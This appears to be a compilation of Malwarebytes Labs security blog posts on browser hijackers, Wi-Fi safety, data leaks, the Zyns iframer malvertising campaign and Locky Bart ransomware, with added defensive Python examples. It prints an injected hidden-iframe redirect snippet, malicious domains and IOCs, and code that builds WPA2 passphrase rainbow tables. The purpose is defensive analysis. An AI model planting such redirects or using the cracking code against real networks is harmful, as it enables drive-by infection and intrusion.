Downloads typically come from proinstall-download[dot]com or report-download[dot]com (both blocked by our Web Protection module). Both of these domains are registered with GoDaddy (no surprise there!). The download location changed not too long ago.
It used to be secure[dot]fileldr08[dot]com and from the screenshot above you can see why we categorized these browser hijackers as PUP.Optional.Spigot. Worth noting is that after they switched away from the above download location, I was unable to install the extensions on Google Chrome. It failed to download and offer the extension. But this got fixed after a few weeks.

The startpage
The new startpage for the affected browser is a typical search page with a toolbar and some shortcuts, pointing to sites where you can find the information or functionality that the hijacker promised to provide, supplemented by local weather and social media links.

Installation guidance
Another typical behavior, that these hijackers copied from the likes of Mindspark, is the right in your face installation guidance with huge green arrows pointing out what your next step should be.
You can find some examples among the removal guides on our forums:
Spigot browser hijackers of this family are easy to recognize and in our opinion hardly worth installing because they add no more functionality than a few bookmarks. We hope this post helps you to avoid them in the future.
As always: Save yourself the hassle and get protected.
Last week, we took a look at the theories behind preventing users from clicking everything (don’t worry, you’re allowed to click that), a deep dive into Locky Bart Ransomware, and a long term drive-by download campaign. We also explored why you should care about data breaches and also released our 2016 State of Malware Report.
Elsewhere from the last week:
Stay safe, everyone!
The Malwarebytes Lab
For anyone who travels, uses their phone in public, or stays connected to the internet wherever they go (which probably means you), Wi-Fi security should be a top priority. In this day and age we use whatever wireless connection we can find, but often don’t think about the dangers of jumping onto a public network. The terms “hack” and “data breach” are more common than ever in the news, and there is a reason for that: the growth in mobile device usage and connected technologies has been a blessing and a new curse, because it has made your information and devices more exposed. Here’s the 101 on Wi-Fi security and what you can do to keep the personal information stored on your mobile devices, well, personal.
1. Free doesn’t mean safe.
Just because Wi-Fi is free doesn’t mean you’re in the clear. Even if you have to log in with a password, likely provided by the establishment you’re in, that doesn’t mean your online activity is private: on a network whose password is shared with everyone in the room, other users of that same network can, with a little effort, still observe your traffic, so only what you encrypt yourself (HTTPS, a VPN) is protected. Also beware of random Wi-Fi hotspots or free networks that appear to be open to join. These could be set up by attackers specifically to take advantage of people who join without thinking.
2. Don’t be a victim.
It’s inevitable that you will use a public network to connect to the internet at some point, especially when you travel and need to work in a public setting such as an airport, coffee shop, or hotel. While you can take advantage of that connection, take precautions about what you do on your laptop, tablet, or smartphone while on it. Avoid sites that hold private, sensitive information, such as your bank accounts. The last thing you want is your savings account drained because you opened your banking app over a public network.
3. Practice public safety.
If you are on a public Wi-Fi network, make sure every site you use loads over HTTPS rather than HTTP. HTTP traffic is sent in the clear, so anyone on the same network can read or alter it; avoid that scenario altogether. Additionally, change your wireless settings so that your device does not automatically connect to available networks, and forget a public network once you leave it. By doing this, you prevent unintentionally putting your mobile activity out in public and your information at risk.
4. Protect your private domain.
As for your own Wi-Fi network, there are some key actions you can take to help secure it. Change the default SSID (network name) and set a strong passphrase; avoid dictionary words. This matters more than it looks: WPA2-Personal derives its key from the passphrase and the SSID together, so attackers precompute tables of keys for common SSIDs (such as manufacturer defaults) paired with common passphrases. A unique SSID makes those tables useless against you, and a long, random passphrase makes the remaining brute-force attack impractical.
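An added example, not from the original post, of why the SSID matters: WPA2-Personal derives the pairwise master key with PBKDF2-HMAC-SHA1 using the SSID as the salt, so a table precomputed for one SSID is useless against any other. The code derives the key, builds a small rainbow table for a common default SSID from a constructed wordlist, and shows a lookup succeeding against that SSID and failing against a unique one. The known-answer check uses the passphrase/SSID test vector published with IEEE 802.11i (“password” / “IEEE”).

```python
import hashlib
import os


def wpa2_pmk(passphrase, ssid):
    """WPA2-Personal pairwise master key: PBKDF2-HMAC-SHA1 over the passphrase with the
    SSID as salt, 4096 iterations, 256 bits. Same passphrase + different SSID = different key."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def build_rainbow_table(ssid, wordlist):
    """The attacker's one-off investment: PMK -> passphrase, valid for exactly one SSID."""
    return {wpa2_pmk(word, ssid): word for word in wordlist}


def lookup(table, pmk):
    """Instant recovery if the victim used a listed passphrase AND the SSID the table was built for."""
    return table.get(pmk)


def random_ssid(prefix="net"):
    """A unique SSID: nobody has a precomputed table for it."""
    return "%s-%s" % (prefix, os.urandom(4).hex())


WORDLIST = ["password", "letmein", "12345678", "sunshine", "iloveyou"]  # constructed wordlist
KNOWN_ANSWER = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"  # 'password'/'IEEE'

if __name__ == "__main__":
    assert wpa2_pmk("password", "IEEE").hex() == KNOWN_ANSWER
    table = build_rainbow_table("linksys", WORDLIST)  # a default SSID is worth precomputing for
    print("default SSID, weak passphrase:", lookup(table, wpa2_pmk("sunshine", "linksys")))
    print("unique S SID, same passphrase:".replace("S S", "S"), lookup(table, wpa2_pmk("sunshine", random_ssid())))
```

The unique SSID only removes the precomputation shortcut; with a captured handshake an attacker can still run the same 4096-iteration derivation per guess, which is why the passphrase itself also has to be long and random.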
5. Get an alternative.
It may be hard to resist the free public Wi-Fi, but if you can afford it and see the value in Wi-Fi security protection, then get yourself a personal hotspot. Mobile network providers like T-Mobile offer various options with generous data plans that make the investment worth it. When you set up your Wi-Fi hotspot, still take the same precautions as you would for your home network, like changing the defaults for added security. If a hotspot is not an option for you, check whether the company you work for provides a Virtual Private Network (VPN). A VPN encrypts everything between your device and the corporate network, so the hotspot operator and anyone else on the public network sees only an encrypted tunnel; that definitely beats trusting a public network when you’re just trying to work outside the office.
It’s a rough cyber world out there, but you can survive it. By being aware of Wi-Fi security and taking the right measures you can keep your devices and private information safe and surf the internet as you please.
Safer Internet Day is an awareness-raising campaign that started in Europe more than a decade ago. Hosted by ConnectSafely.org, Safer Internet Day gained official recognition in the US in late 2012, with a joint agreement between the Department of Homeland Security and the European Commission to work together to build a better Internet for young people. Now, it is celebrated in more than 100 countries worldwide.
The theme for this year’s Safer Internet Day celebration is “Be the change: Unite for a better Internet.” Organizers are looking for people to post about positive social actions online—whether it’s a random act of kindness or a full-on flash mob. Here are some ways you can participate:
In the meantime, bone up on security basics to stay safe online today—and every day. Here are a few starter articles that can help you remain malware-free in 2017.
Now get out there and be safe!
2016 was the year that reminded us how important prevention is, no matter what type of user you may be. Indeed, ransomware dominated the threat landscape and was heavily distributed via phishing emails, compromised websites, and malicious ads. With a threat that encrypts your valuable data, there is often very little you can do after the fact.
To give you an idea of how fast ransomware progressed, we saw a 267 percent increase between January 2016 and November 2016, with over 400 different variants in total. The most impacted users were businesses, possibly correlated with the increase in malicious spam during the same time period. Several large botnets were used to send phishing emails containing Office documents or scripts purporting to be invoices or other such lure.
While malware authors mostly relied on ransomware to make the bulk of their revenues, we noted an increase in ad fraud as well. Malware infested computers that visit websites and click on ads within a hidden desktop are responsible for billions of dollars in losses for advertisers. But they are also a threat to end users as they can also get infected with other types of malware as a result of this browsing activity.
Botnets continued to become a huge threat, not only as spam machines like mentioned earlier but also to launch severe Distributed Denial of Service attacks that impact large portions of the Internet. While traditional PCs continue to be used as bots, internet enabled devices, also known as IoT, were a low hanging fruit threat actors went after. Security cameras, routers, and many other internet connected devices are often poorly secured with default passwords or security flaws that will rarely ever get patched by their owners. Those same devices were used to take down other websites and wreak havoc across the internet.
Mobile malware keeps evolving with better anti-AV tricks, while end users continue to get infected mostly by downloading free apps from unauthorized stores. Brazil, Indonesia, the Philippines, and Mexico were some of the top countries affected by mobile malware.
In 2017 we can only expect ransomware to become more aggressive and have a direct impact on our lives as healthcare facilities or critical infrastructure are affected. Unless there are major laws forcing manufacturers to make IoT devices more secure out of the box, we can expect the size of such botnets to grow bigger and pose an even more dire threat to the internet.
2017 will also be the year where we see whether exploit kits will finally return as the top infection method but we can only expect spam campaigns to remain strong and steady especially against small and medium businesses, while larger organizations may also get targeted more frequently via clever phishing attacks.
To read more about our malware in 2016 and our predictions, please download the report here.
Because as the size of your organization increases, the probability that at least one employee’s company email address is in that breach approaches 1. That lone employee is going to suffer some unfortunate impacts, from identity theft, financial scams and blackmail to death threats (as seen in the Ashley Madison breach). There’s an organizational impact as well: a single compromised account can serve as a launching point for reconnaissance, phishing waves, or a pivot point for a further attack. But wait: what if the exposure is a company webmail that is isolated from the main corporate network? Then there will be an employee who reuses their password. What if your company has a policy against that? Then there will definitely be employees who reuse their passwords. Unless your organization uses password managers, a single breached account has a very good chance of being a pivot point for more serious attacks.
Email isn’t the end of sensitive data loss, unfortunately. Stack Overflow, a perennial favorite for developers working out knotty problems, frequently has proprietary code cut and pasted into the site, sometimes with network configuration data attached. Pastebin can and does have network details and code with misconfigured expiration dates, waiting to be scooped up. And LinkedIn is an absolute goldmine for mapping potential accesses to employees. So how do you go about plugging leaks? A three-point strategy can get you started.
1. Legal – This is most important for an internal data protection policy because there are some hard limits to what you can and cannot tell employees to post online. Consulting with an attorney can set some appropriate bounds for what sort of mitigations you want to implement. Further, a lawyer well briefed on cyber threats can be a valuable asset in issuing takedowns of offending material.
2. Stovepipe breaking – Communicating directly with first-line managers to discover how and why data leaves your organization should constitute the bulk of any data loss mitigation plan. With the exception of the lone knucklehead who signs up for an inappropriate site with a company email (you have one of these, I promise), most data loss occurs because business use cases do not align with existing security policy, and users are going to find a workaround. Does your default computing environment have tooling sufficient for developers to do their job, or are you two versions behind industry standards? How does your security team get a piece of malware off an infected host and onto a test machine? What’s the default attachment size on the corporate mail instance? And if you run a virtualized environment, what’s the default memory allocation and how much hassle does an employee have to suffer to get it raised? These may appear on the surface to be small, too-in-the-weeds questions. They are in fact very predictable preludes to data loss or a full-on breach, because in each instance an employee is incentivized to break policy to get their job done. This is fortunately preventable: talk to your first-line management and gather use cases before policy gets set.
3. SOC feedback – Last but also important is to make sure your security team becomes aware of company data when it lands in public view. This doesn’t have to be onerous or time-consuming; simple crawlers with a list of vetted keywords and domains, run as a cron job, can go a long way towards finding data where it shouldn’t be. Of course the best case is to prevent leaks before they happen, but swift detection and takedowns (remember you spoke to your lawyer?) can mitigate the damage.
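As an added example of the “simple crawler with vetted keywords and domains” idea (not from the original post): the scanner below runs a handful of patterns, internal email addresses and hostnames, agreed project keywords, and private-key headers, over whatever text your fetcher pulled down, and reports each hit with its source and line number. The organisation profile and the three pastes are constructed; in practice `crawl` would be handed a real fetcher and run from cron, with the hits going to the SOC's queue.

```python
import re

# Constructed organisation profile; replace with your own vetted lists.
ORG_DOMAINS = ("corp.example.com", "example-internal.net")
VETTED_KEYWORDS = ("PROJECT-ORION", "svc-backup", "10.42.")

_DOMAINS = "|".join(re.escape(d) for d in ORG_DOMAINS)
PATTERNS = {
    "email": re.compile(r"[\w.+-]+@(?:%s)\b" % _DOMAINS, re.I),
    "hostname": re.compile(r"\b[\w-]+\.(?:%s)\b" % _DOMAINS, re.I),
    "keyword": re.compile("|".join(re.escape(k) for k in VETTED_KEYWORDS)),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
}


def scan_text(source, text):
    """One (source, kind, match, line_no) tuple per pattern hit, in document order."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                hits.append((source, kind, m.group(0), n))
    return hits


def crawl(fetch_all):
    """fetch_all() -> {source id: text}; returns every hit across all sources."""
    return [hit for source, text in fetch_all().items() for hit in scan_text(source, text)]


# Constructed pastes standing in for what a real fetcher would return.
SAMPLE_PASTES = {
    "paste/aB3x": "nginx config\nupstream api { server api01.corp.example.com:8443; }\n# contact ops@corp.example.com\n",
    "paste/zz99": "def fib(n):\n    return n if n < 2 else fib(n - 1) + fib(n - 2)\n",
    "paste/k3y": "-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n-----END RSA PRIVATE KEY-----\n# PROJECT-ORION deploy key\n",
}


def sample_fetch():
    return SAMPLE_PASTES


if __name__ == "__main__":
    for source, kind, match, line_no in crawl(sample_fetch):
        print("%s:%d [%s] %s" % (source, line_no, kind, match))
```

Keep the keyword list short and specific: a generic term such as the company name alone will bury the SOC in false positives, while internal hostnames, service-account names and project code names rarely appear in public for innocent reasons.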
Third-party data breaches are happening at an accelerating pace and show no signs of abating. Secondary effects of these breaches tend to spread tendrils of insecurity much further than the individual site in question. Take some time now to talk to managers, your legal department, and your SOC, and you can make sure that the next breach won’t be catastrophic for you as well.
We often get asked about drive-by download attacks, how they work, and specifically about what sites people may have visited just prior to getting infected. This is an interesting aspect when tracking campaigns and what they lead to.
Typically, one can divide the drive-by landscape into two categories: malvertising and compromised websites. The former involves legitimate websites that rely on advertising as their source of revenue. Crooks have long been able to insert themselves into the ad delivery chain in order to push malicious code, such that the simple fact of viewing a page with ads actually infects your computer. The latter consists of websites that have been hacked and injected with malicious code, and are likewise used to redirect users to malicious content.
What we refer to as “campaigns” are specific attributes from the same threat actor or group, similar to what is used to categorize malware families. There are many different campaigns for both streams; some come and go while others stick around for long periods of time. For instance, EITest is one particular campaign for compromised sites which has been going on for years.
Campaigns are an essential part of the underground ecosystem because they continuously feed potential new victims into the infection funnel which ultimately translates into revenues for online criminals.
Today we are taking a look at an iframe campaign (Zyns iframer) that has been going on since at least 2014. There are specific indicators of compromise (IOCs) that haven’t really changed over time and the underlying structure has also remained pretty similar. We have seen this attack chain primarily associated with malvertising, and in particular via adult sites. During its course, we noted several different exploit kits being pushed by this campaign (Angler EK, Nuclear Pack, Neutrino EK, RIG EK).
Patterns (IOCs)
The redirection infrastructure had very distinct patterns and also shared many of the same server IP addresses over time. We also saw the evolution from dynamic DNS (via subdomains) to domains on dubious top-level domains (TLDs).
URL patterns:
/out.php?sid=1
/out.php?sid=3
/link.php
/linkx.php
Server headers:
HTTP/1.1 200 OK
Server: Apache/2.2.22 (@RELEASE@)
X-Powered-By: PHP/5.3.3
Redirection URL:
<iframe src="[EK URL HERE]" width="468" height="60" style="position:absolute;left:-10000px;"></iframe>
First spotted, 2014
Our earliest records are from the fall of 2014 with malvertising attacks mostly affecting Russian users. A capture from later that year shows a drive-by download from blogspot.ru via JetSwap, an “Active Promotion System!” where members and advertisers are linked together via an affiliate program. In this particular case, the advert loads a malicious iframe to qera.zyns.com which performs a 302 redirect to another domain qzertyu.myz.info and in turn redirects to the Angler exploit kit.
Payload: SmokeLoader.
2014-2015 transition
The campaign kept going as 2015 rolled in with an almost identical structure. Note the addition of ‘link.php’ to the domain in charge of loading iframes to EK. Angler wasn’t the only exploit kit used by these actors. For example we see Nuclear Pack below:
A Sucuri Labs post shows another .wha.la domain involved in the redirect:
22.214.171.124 kophon.wha.la/out.php?sid=1
A piece of code containing the same iframe redirection structure was posted in May 2015 to an online PHP editor. It shows a distinct URL pattern for the RIG exploit kit (RIG EK version 3).
2016 was an interesting year for exploit kits with the disappearance of Angler EK in June. The capture shown below is one of the latest artifacts we have from Angler EK before it went missing.
Payload: JuicyLemon (ransomware).
As we know, criminals transitioned to Neutrino EK after Angler EK went down. During the next few months, up until sometime in September there was a mix of both Neutrino EK and RIG EK used by the actors behind this campaign. Below, Neutrino EK in July:
The campaign was spotted in late June by Malekal (link) via malvertising on adult sites (with Gootkit mentioned as the payload).
Malware Traffic Analysis wrote a blog entry shortly after (link):
126.96.36.199 port 80 - glamgirltube.tk - GET /engine/classes/js/jquery.js - file with injected script
188.8.131.52 port 80 - fijir0.tk - GET /linkx.php - gate
184.108.40.206 port 80 - jy.neutralarbitrations.com - RIG EK
and in July Broad Analysis did too (link):
220.127.116.11 – relaxtube.tk – GET /engine/classes/js/jquery.js – Rig EK REDIRECT
18.104.22.168 – waferako.cf – GET /linkx.php – Rig EK REDIRECT
22.214.171.124 – ds.pacificbeachcar.com – Rig EK LANDING PAGE
RIG EK (also known as RIG Standard), seen in September:
In early December, we noticed a slight change with a new domain used as a redirector. At the same time, there were several instances where two different RIG EKs were pushed from the same redirection chain, leading to two different malware payloads.
In January we started seeing the same redirector that had been pushing this campaign switch to a different chain, this time via compromised sites. This was interesting because throughout December, we were seeing the usual sequence of events with the standard iframe, even though this chain came via a different sid (sid 3) than the typical sid 1.
December 2016 (with sid=3)
Come January and we have a completely new pattern where an iframe is now inserted via a double chain of events, most notably malicious code injection that looked new to me within a WordPress plugin called Contact Form 7.
January 2017 (also with sid=3)
Payload: Gootkit.
The end of the road?
In January, several different trails we were tracking began to disappear, showing that the Zyns iframer campaign was likely evolving or got merged into something else. The diversity of payloads and exploit kits may indicate there was no particular tie with any specific malware distributor.
Threat actors will buy traffic from various sources to push malware, with malvertising often being the top choice for its wide impact. This particular case is a mix of malvertising and bogus adult websites aimed at driving a lot of users into exploit kit landing pages.
To protect yourself against drive-by download attacks, the first thing to do is to ensure that your computer is fully up-to-date. Use Malwarebytes to stay safe from malicious websites and thwart exploits (known and unknown) before they launch their payload.
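For defenders who capture web traffic, the gate URL paths, the server header pair and the off-screen 468x60 iframe listed under Patterns (IOCs) above can be turned into a small triage rule. The following is an added example written for this page, not Malwarebytes code; hostnames and the sample transactions are constructed placeholders, and the rule only flags a transaction when it carries the hidden iframe or when gate path and server fingerprint coincide, since each indicator on its own is weak evidence.

```python
import re

# URL paths listed under Patterns (IOCs) in the post.
GATE_PATH_RE = re.compile(r"^/(out\.php\?sid=[13]|linkx?\.php)$")
# Server header fingerprint seen on the redirectors (header names compared lowercased).
FINGERPRINT_HEADERS = {"server": "Apache/2.2.22 (@RELEASE@)", "x-powered-by": "PHP/5.3.3"}
# The injected iframe: a 468x60 banner-sized frame pushed far off-screen.
HIDDEN_IFRAME_RE = re.compile(r"<iframe[^>]*\bsrc=[\"']([^\"']+)[\"'][^>]*>", re.IGNORECASE)
OFFSCREEN_RE = re.compile(r"position\s*:\s*absolute\s*;\s*left\s*:\s*-\d{4,}px", re.IGNORECASE)


def check_record(rec: dict) -> list:
    """Return the indicators matched by one captured HTTP transaction.
    rec has keys: host, path, headers (dict), body (response text)."""
    hits = []
    if GATE_PATH_RE.match(rec.get("path", "")):
        hits.append("gate-url")
    hdrs = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    if all(hdrs.get(k) == v for k, v in FINGERPRINT_HEADERS.items()):
        hits.append("server-fingerprint")
    for m in HIDDEN_IFRAME_RE.finditer(rec.get("body", "")):
        tag = m.group(0)
        if OFFSCREEN_RE.search(tag) and 'width="468"' in tag and 'height="60"' in tag:
            hits.append("offscreen-iframe:" + m.group(1))
    return hits


def triage(records: list) -> list:
    """Flag a transaction on the hidden iframe alone, or on gate path plus fingerprint."""
    flagged = []
    for rec in records:
        hits = check_record(rec)
        strong = (any(h.startswith("offscreen-iframe") for h in hits)
                  or {"gate-url", "server-fingerprint"} <= set(hits))
        if strong:
            flagged.append({"host": rec["host"], "path": rec["path"], "hits": hits})
    return flagged


# Constructed sample transactions; hostnames are placeholders, not from the post.
SAMPLE = [
    {"host": "gate.example.invalid", "path": "/linkx.php",
     "headers": {"Server": "Apache/2.2.22 (@RELEASE@)", "X-Powered-By": "PHP/5.3.3"},
     "body": '<iframe src="http://ek.example.invalid/land" width="468" height="60" '
             'style="position:absolute;left:-10000px;"></iframe>'},
    {"host": "cdn.example.invalid", "path": "/link.php",
     "headers": {"Server": "nginx"}, "body": "ok"},
    {"host": "shop.example.invalid", "path": "/out.php?sid=1",
     "headers": {"Server": "Apache/2.2.22 (@RELEASE@)", "X-Powered-By": "PHP/5.3.3"},
     "body": "<html>redirecting</html>"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f["host"], f["path"], f["hits"])
```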
Thanks to @hasherezade for help with payload identification!
IOCs
In this post we will cover the Locky Bart ransomware. The developers of Locky Bart already had two very successful ransomware campaigns running, called “Locky” and “Locky v2”. After some users reported being infected with Locky Bart, we investigated it to find the differences, so as to gain greater knowledge and understanding of this new version.
The Locky Bart ransomware has new features that are different from its predecessors. It can encrypt a machine without any connection to the Internet. It also has a much faster encryption mechanism.
Our research would also indicate that the backend infrastructure of Locky Bart might be maintained by a different threat actor than the original versions. While the internals of the malicious binary share a great number of similarities, there were some notable differences.
These included comments in the code of the application and, more notably, the kind of software used on the backend server.
This did not come as a surprise, as cyber-criminals are known to share, rent, sell, and even steal malicious code from one another.
Analysis of Locky Bart’s binary
In their previous incarnations, Locky and Locky v2 used a simpler encryption process. They enumerated the files targeted for encryption, placed each in a password protected ZIP archive, and repeated this process until all the files were encrypted. The creators did not use the AES ZIP protection, but an older algorithm, and because of this, researchers were able to make a decrypting application.
Locky Bart performs a fairly straightforward set of actions to encrypt the victim’s files. They are as follows:
The function used to generate a seed, which is used to create the key that the files are encrypted with. It uses variables such as system time, process ID, thread ID, process alive time, and CPU ticks to generate a random number.
The function used to enumerate and encrypt the files.
Bart will skip any folders with these strings in them.
The file-types that Bart targets to encrypt.
The string that Bart uses to make a Ransom Note. The “khh5cmzh5q7yp7th.onion” is the payment server, and the “AnOh/Cz9MMLiZMS9k/8huVvEbF6cg1TklaAQBLADaGiV” is a sample UID that would be sent with the URL to the server for the victim to make a payment. Remember that the UID is only an encrypted version of the key that can be used to decrypt a victim’s files.
How the creators of Bart Locky acquire the key is what differentiates this version from its predecessors. When the victim of the ransomware visits the URL to make their payment for the ransom, they are unknowingly sending their decryption key to the criminals.
Let’s break down the process in a more granular method, to better understand it.
This UID is useless to the victim though, because they do not have the private key to decrypt their files. However, the ransomware creator’s server does, meaning their server can not only use the UID to identify the victim, but also decipher the UID into the victim’s key upon payment of the ransom.
In the end, only the ransomware creators can decrypt the user’s files, and because of this feature, there is no need to access the malicious server to encrypt them.
Locky Bart Software Protection technique
The Bart Locky binary also uses a software protection technique. This technique is known as code virtualization and is added to Bart Locky binary by using a program called “WPProtect”.
This makes the binary significantly more difficult to disassemble and complicates stepping through the code, a technique used to understand what it does. Legitimate uses of this type of software are most typically seen in anti-piracy mechanisms. An example of a commercial version of this type of software would be Themida. The author of Bart Locky probably chose this particular anti-tampering mechanism as it is free, open source, and provides many features. This adoption of software protection techniques is a troubling development. These applications, including WPProtect, make reversing and analysis significantly more challenging.
The Locky Bart server
The second half of Locky Bart is the server and backend. This server is used to provide the victims with a payment mechanism to pay the ransom.
The Bart Locky backend runs on a framework called Yii, a high-performance PHP framework suited to developing Web 2.0 applications.
This framework contains a wealth of information on the inner workings of Bart Locky.
The Yii debug panel, which contained extensive information about the server configuration.
Access to this control panel revealed:
Locky Bart stores information in a MySQL database. The credentials to the MySQL server reside in a “Config” PHP file in the “Common” folder of the site. An example path looks like the following: /srv/common/config/main-local.php
The contents of Bart’s server MySQL config file.
The information contained in the MySQL database consists of the victim’s unique identifier, the encryption key, Bitcoin address, paid status, and timestamps.
A small part of the table holding the ransomware information in the database.
The Locky Bart server also contains a second database that contains further information on the victims of the ransomware.
Locky Bart ransomware’s “Stats” table example.
A “ReadMe” file found on the server that seems to detail some features on the Stats database.
The Locky Bart server contains a “BTCwrapper.php” which uses a “controller” method to expose a BTC wallet class that all other PHP files can call. This class initiates a connection to the Bitcoin servers using a username and password. It contains complete methods for controlling and using the main BTC wallet set up by the criminal to store all the money received; this wallet is emptied regularly. The class can also create new BTC addresses and, on payment, empty those wallets into the main wallet. There are also methods to check on the status of payments from each victim.
Some of the functions that the BTCWrapper Class calls.
The first few functions of the BTCWrapper Class. The class uses cURL to contact a locally run bitcoin server that communicates with the blockchain.
The Locky Bart server had two Bitcoin addresses to which victims’ payments were transferred. The current one:
The current BTC address associated with Locky Bart has accumulated $7,671.60 in its lifetime.
And a second one, that was referenced in PHP configurations on the malicious server.
An older BTC address also associated with Locky Bart had accumulated $457,806.06.
The server portion of this ransomware was configured to function very similarly to a legitimate business. It mirrored a “Support Ticket Department” where the user could contact the ransomware support for any issues they may have experienced.
The process was completely automated. The user would get infected and visit the site as their ransom note instructed. When they visited the site, the server would then generate their unique BTC address and present it to them automatically.
After this, if the user was considering paying the ransom but had any questions, they could literally contact support.
If they did indeed make the decision to pay, they would proceed to buy Bitcoins through the many methods available (BTC ATM, LocalBitcoins – which allows you to meet people local to trade BTC for money or use banks and wiring like Western Union, or buy them with a credit card online).
Once the user has the amount specified by the ransomware in their own BTC Wallet, they would then transfer the money from their wallet to the Payment Address the Ransomware Payment Page generated for them.
The ransomware server checks every few minutes whether a payment has been made for any of its victims and whether that payment has been confirmed. Once the server verifies a payment, it marks that victim in the database as “Paid”.
When a victim is marked as “Paid”, the server generates a “Decryption Tool EXE”, writes the user’s encryption key into the binary of that exe, and presents a link to download it on the victim’s personal payment page. Later, when the victim checks their payment page again, they will see the link, download the tool, and decrypt their files.
The generation of the victim’s decryption tool on the fly.
Conclusion
This research into Locky Bart ransomware gives a great view of the side of a ransomware operation that we typically do not get to see, the backend. The criminals who run these operations do so on an extremely professional level, and users should always take an extra step in protecting themselves from these types of attacks.
Ransomware will continue to grow and get more advanced, and users need to make sure they are protected in the form of backups, security application protection like Malwarebytes, and some type of anti-ransomware technology protecting them from these advanced attacks. Users running Malwarebytes already have protection from ransomware, as Malwarebytes is equipped with our anti-ransomware technology.